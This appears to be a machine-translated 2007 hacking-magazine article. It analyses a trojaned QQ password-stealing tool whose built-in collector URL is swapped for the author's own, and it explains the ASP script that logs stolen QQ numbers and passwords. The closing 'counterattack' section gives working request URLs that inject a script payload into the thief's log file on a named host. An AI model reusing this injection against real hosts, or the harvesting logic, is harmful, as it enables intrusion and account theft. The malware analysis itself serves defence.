Webshell analysis and counterattack of QQ account theft software

Author: fhod
Note: This article has been published in the hackers' manual in the 10th period of. For more information, see the source!

Analysis and counterattacks on webshells of QQ account theft software by fhod Xiaocai

An Analysis of the hacker's QQ password agent software ---- Xiaocai

Today, I am bored to explain the QQ stealing principle to a friend. I found a tool on the Internet, "hacker QQ password Agent", and found that the software has a backdoor. Let me take you through the analysis below.

First, we use nod32 to check whether there are any viruses. Figure 1
Img: http://up.2cto.com/Article/200710/20071026101018890.jpg

No virus. Let's open monitoring and run it. See figure 2.
Img: http://up.2cto.com/Article/200710/20071026101021448.jpg


We can see that NOD32 has detected the virus. To confirm. I used the file monitoring feature of the 'Trojan-assisted finder 'to detect it.

Figure 3
Img: http://up.2cto.com/Article/200710/20071026101024830.jpg

Create C: Documents and SettingsAdministratorLocal SettingsTempIXP003.TMP123.exe

It is clear that the software stores 123.exe at the same time while the NOD32 detects and removes this file.

C: Documents and SettingsAdministratorLocal SettingsTempIXP003.TMP

Use peidto check 123.exe. Figure 4
Img: http://up.2cto.com/Article/200710/20071026101026521.jpg

EP section. nsp1 should know that this is the shell of BeiDou. Let's look at section vmp figure 5.
Img: http://up.2cto.com/Article/200710/20071026101027374.jpg



In this case, vmprotect is used to eliminate the virus. We will not continue to analyze the Trojan horse in 123.exe.

Next we will analyze whether the generated file is equally worrying.

Configure a random figure 6

Img: http://up.2cto.com/Article/200710/20071026101028286.jpg

Simple diagram of esp law for Ollydbg shelling
Img: http://up.2cto.com/Article/200710/20071026101029983.jpg



After shelling is successful, we use PEID to detect figure 8.
Img: http://up.2cto.com/Article/200710/20071026101033275.jpg


We use c32asm for disassembly and search for asp Fig 9.
Img: http://up.2cto.com/Article/200710/20071026101033262.jpg



What did you see? I set it by default at http://k.thec.cn/xieming/69q/qq.asp ., How can it be http://langyeqq.cn/qq/newbacka.asp this! Let's look at figure 10.
Img: http://up.2cto.com/Article/200710/20071026101038267.jpg

"PzQQ" can be seen, that is, his account theft. From these, we can be sure that this software not only casts a trojan during running, in addition, even the files we configured have been left with a backdoor, and the author is waiting for the receiving number.





Backdoor counterattack by fhod [E.S. t vip]



Seeing this, I'm sure everyone is as angry with me. Are we going to take over as the author? Of course not. Now let's start fighting back.



Let's take a look at the qq. asp code.



First, let's take a look

StrLogFile = "Q7.txt"

This is the qq..txt file.





Continue viewing code

QQNumber = request ("QQNumber ")

QQPassWord = request ("QQPassWord ")

QQclub = request ("QQclub ")

QQip = request ("QQip ")



We can customize the data of these parameters.



Look down

If QQNumber = "" or QQPassWord = "" then

Response. write "pzQQ"

Response. end



If the value of QQNumber and QQPassWord is null, pzQQ is returned. Then the program stops working. As long as the two values are not empty, continue to execute the following code.

StrLogText = StrLogText & QQNumber & "----" & QQPassWord & "---- Member:" & QQclub & "---- IP:" & QQip & "(" & request. servervariables ("REMOTE_HOST ")

StrLogText = StrLogText &")"

Write the q7.txt File

Format: QQ number ---- QQ password ---- Member: ---- IP:



Continue to read the following code

Set f = Server. CreateObject ("scripting. filesystemobject") (created automatically without the q7.txt file)

Set ff = f. opentextfile (server. mappath (".") & "& strLogFile, 8, true, 0)

Ff. writeline (StrLogText) (open q7.txt and write data)

Last response. write "sent successfully! "A Success prompt is displayed when the conditions are met.



All the code, that is, the program does not do any filtering... and processing... as long as it meets qq. asp? QQNumber = 123 & QQPassWord = 123, return "sent successfully! "Prompt.

Http://www.ciker.org/soft/qq.asp? QQNumber = 123 & QQPassWord = 123

Figure 11
Img: http://up.2cto.com/Article/200710/20071026101040956.jpg

This proves that QQNumber = 123 & QQPassWord = 123 can be defined by ourselves. What if we write a script code that is not a number? Will it be executed? Let's try it.

Http://www.ciker.org/soft/qq.asp? QQNumber = 123 & QQPassWord = <script> alert ("fhod") </script>



Figure 12

Img: http://up.2cto.com/Article/200710/20071026101042821.jpg


Code inserted... let's take a look.

The source file of http://www.ciker.org/soft/q7.txtis a sample file ..



Figure 13
Img: http://up.2cto.com/Article/200710/20071026101045398.jpg


Verify again